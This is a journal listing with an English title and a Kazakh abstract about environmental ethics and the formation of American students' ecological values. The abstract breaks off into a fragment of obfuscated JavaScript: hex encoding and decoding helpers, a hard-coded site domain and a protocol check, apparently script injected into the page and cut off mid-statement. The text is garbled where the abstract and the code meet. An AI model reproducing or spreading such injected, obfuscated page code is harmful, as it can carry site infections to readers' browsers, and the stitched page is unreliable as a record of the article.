THE GREENING OF AMERICA’S YOUTH: REMARKS ON ENVIRONMENTAL ETHICS (Хабаршы. Психология және социология сериясы, 2011)
АҚШ-тағы «жасылдар» қозғалысы үлкен саяси жəне əлеуметтік күшке ие. Автор студенттік жастардың экологиялық санасы мен құндылықтарының қалыптасуындағы философия тарихының рөлін, гуманитарлық пəндерді жалпы қарастырады.// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "bulletin-psysoc.kaznu.kz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e